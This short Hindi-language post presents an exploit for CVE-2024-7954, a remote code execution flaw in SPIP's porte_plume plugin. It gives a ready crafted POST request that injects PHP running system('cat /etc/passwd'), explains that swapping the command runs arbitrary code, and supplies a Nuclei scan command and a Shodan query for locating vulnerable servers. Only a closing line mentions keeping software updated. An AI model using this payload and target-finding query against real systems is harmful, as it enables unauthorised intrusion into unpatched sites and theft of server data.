
CVE-2024-7954 के लिए एक्सप्लॉइट, SPIP के porte_plume प्लगइन में एक गंभीर RCE, एक तैयार किया गया HTTP अनुरोध और स्वचालित स्कैनिंग के लिए Nuclei टेम्पलेट के साथ।
porte_plume प्लगइन, जो SPIP संस्करणों 4.30-alpha2, 4.2.13, और 4.1.16 से पहले के संस्करणों द्वारा उपयोग किया जाता है, एक गंभीर मनमाना कोड निष्पादन (RCE) भेद्यता के प्रति संवेदनशील है। यह दोष एक दूरस्थ, अप्रमाणित हमलावर को एक विशिष्ट HTTP अनुरोध तैयार करके SPIP उपयोगकर्ता के रूप में मनमाना PHP कोड निष्पादित करने की अनुमति देता है। शोषण की संभावना गंभीर है, जिससे हमलावर सर्वर पर दुर्भावनापूर्ण कमांड चला सकते हैं, जिससे अनधिकृत पहुंच, डेटा उल्लंघन, या आगे सिस्टम से समझौता हो सकता है।
##Nuclei Scan
kali@Dell:~/nuclei-templates-main/http/cves/2024$ nuclei -l targets -t /home/kali/nuclei-templates-main/http/cves/2024/CVE-2024-7954.yaml
इस भेद्यता का शोषण करने के लिए उपयोग किए जा सकने वाले एक निर्मित HTTP अनुरोध का उदाहरण निम्नलिखित है:
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}} -> IP
Content-Type: application/x-www-form-urlencoded
data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB
POST अनुरोध SPIP के index.php फ़ाइल के porte_plume_previsu क्रिया पर निर्देशित होता है।system() फ़ंक्शन का उपयोग करके एक कमांड निष्पादित करता है (इस मामले में, cat /etc/passwd), जो पासवर्ड फ़ाइल की सामग्री पढ़ता है।system() फ़ंक्शन के भीतर कमांड को बदलकर, एक हमलावर सर्वर पर कोई भी PHP कोड निष्पादित कर सकता है, जिसके गंभीर परिणाम हो सकते हैं।संभावित रूप से कमजोर SPIP स्थापनाओं की पहचान करने के लिए, निम्नलिखित Shodan खोज क्वेरी का उपयोग किया जा सकता है:
app="SPIP"
यह भेद्यता सॉफ़्टवेयर को अद्यतित रखने और शोषण से बचाव के लिए मजबूत सुरक्षा उपायों को लागू करने के महत्व को रेखांकित करती है।